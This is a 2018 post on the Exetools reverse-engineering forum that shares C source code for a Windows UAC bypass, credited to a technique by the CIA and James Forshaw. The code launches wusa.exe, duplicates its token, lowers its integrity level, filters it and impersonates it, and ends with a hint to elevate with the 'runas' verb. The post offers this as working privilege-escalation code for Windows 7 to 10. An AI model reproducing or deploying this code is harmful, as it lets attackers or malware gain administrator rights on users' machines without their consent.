Exetools  

Go Back   Exetools > General > Source Code

Notices

 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #1  
Old 03-17-2018, 21:13
0xall0c 0xall0c is offline
Friend
 
Join Date: Mar 2018
Posts: 67
Rept. Given: 0
Rept. Rcvd 4 Times in 3 Posts
Thanks Given: 25
Thanks Rcvd at 65 Times in 35 Posts
0xall0c Reputation: 4
Uac bypass implementation

This is an implementation of uac bypass method (Author: CIA & James Forshaw).
Works from windows 7 to latest windows 10 fall creators update.

Code:
int StepOverUAC()
{
	SECURITY_ATTRIBUTES sa;
	sa.nLength = sizeof(SECURITY_ATTRIBUTES);
	sa.bInheritHandle = TRUE;
	sa.lpSecurityDescriptor = NULL;

	if (!CreatePipe(&inRead, &inWrite, &sa, 0))
		return 0;
	if (!CreatePipe(&outRead, &outWrite, &sa, 0))
		return 0;
	NtSetInformationToken nt = (NtSetInformationToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtSetInformationToken");
	RtlLengthSid rts = (RtlLengthSid)GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlLengthSid");
	NtFilterToken filter = (NtFilterToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtFilterToken");
	DWORD Error, bytesIO;
	NTSTATUS Status;
	HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
	HANDLE filterToken = NULL;
	BOOL bCond = FALSE;
	SHELLEXECUTEINFO shinfo, sh;
	SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
	TOKEN_MANDATORY_LABEL tml, *ptml;
	PSID pIntegritySid = NULL;
	STARTUPINFO si, si2;
	PROCESS_INFORMATION pi, pi2;
	WCHAR szBuffer[MAX_PATH];

	RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
	shinfo.cbSize = sizeof(shinfo);
	shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
	shinfo.lpFile = L"wusa.exe";
	shinfo.nShow = SW_HIDE;
	if (!ShellExecuteEx(&shinfo))
		return 0;
	if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken))
		return 0;
	TerminateProcess(shinfo.hProcess, -1);
	WaitForSingleObject(shinfo.hProcess, -1);
	if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken))
		return 0;
	if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID,0, 0, 0, 0, 0, 0, 0, &pIntegritySid))
		return 0;
	tml.Label.Attributes = SE_GROUP_INTEGRITY;
	tml.Label.Sid = pIntegritySid;
	Status = nt(hNewToken, TokenIntegrityLevel, &tml, sizeof(tml));
	if (!NT_SUCCESS(Status))
		return 0;
	filter(hNewToken, 0x4, NULL, NULL, NULL, &filterToken);
	if (!ImpersonateLoggedOnUser(filterToken))
		return 0;
}
After this just use ShellExecute with "runas" verb.
Reply With Quote
The Following 2 Users Say Thank You to 0xall0c For This Useful Post:
tonyweb (03-21-2018), Zeokat (03-18-2018)
 

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is On


Similar Threads
Thread Thread Starter Forum Replies Last Post
Armadilled Programs with Custom Implementation TmC General Discussion 3 05-15-2006 08:58
Implementation of a TrustedFlow System Prototype redbull General Discussion 0 06-24-2005 21:57


All times are GMT +8. The time now is 08:53.


Always Your Best Friend: Aaron, JMI, ahmadmansoor, ZeNiX, chessgod101
( 1998 - 2024 )